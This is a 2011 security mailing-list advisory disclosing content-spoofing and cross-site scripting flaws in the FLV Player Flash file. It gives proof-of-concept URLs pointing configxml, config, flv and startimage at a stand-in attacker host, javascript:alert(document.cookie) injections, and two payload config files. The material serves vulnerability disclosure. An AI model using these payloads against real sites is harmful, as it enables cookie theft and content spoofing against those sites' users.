Hello list!

I want to warn you about Content Spoofing and Cross-Site Scripting
vulnerabilities in FLV Player.

-------------------------
Affected products:
-------------------------

Vulnerable are different versions of FLV Player (MINI, NORMAL, MAXI and
MULTI). Note, that version NORMAL occurs under names player_flv.swf and
player_flv_classic.swf.

The author of FLV Player didn't fix these vulnerabilities.

----------
Details:
----------

Content Spoofing (WASC-12):

Flash-files of player FLV Player accept arbitrary addresses in parameter
configxml, which allows to spoof content of flash - i.e. by setting address
of configuration file from other site.

http://site/player_flv.swf?configxml=http://attacker/1.xml

http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml

http://site/player_flv_multi.swf?configxml=http://attacker/1.xml

Flash-files of player FLV Player accept arbitrary addresses in parameter
config, which allows to spoof content of flash - i.e. by setting address of
configuration file from other site.

http://site/player_flv.swf?config=http://attacker/1.txt

http://site/player_flv_maxi.swf?config=http://attacker/1.txt

http://site/player_flv_multi.swf?config=http://attacker/1.txt

Flash-files of player FLV Player allow to spoof all important parameters,
including flv and startimage, and at that accept arbitrary addresses in
parameters flv and startimage, which allows to spoof content of flash - i.e. 
by setting addresses of video and image from other site. And for setting of 
links at arbitrary site it's possible to use parameters onclick and 
ondoubleclick.

http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg

http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg

http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg

http://site/player_flv_mini.swf?flv=http://attacker/1.flv

XSS (WASC-08):

http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)

http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie)

http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie)

http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie)

http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml

http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml

File xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)" />
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />
</config>

http://site/player_flv_maxi.swf?config=http://attacker/xss.txt

http://site/player_flv_multi.swf?config=http://attacker/xss.txt

File xss.txt:

onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)

The code will execute after a click (or double click). It's strictly social
XSS.

------------
Timeline:
------------

2011.02.24 - found these vulnerabilities in different versions of the player
and informed owner of the site which used it.
2011.04.21 - announced at my site.
2011.04.22 - informed developer.
2011.08.20 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/5098/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua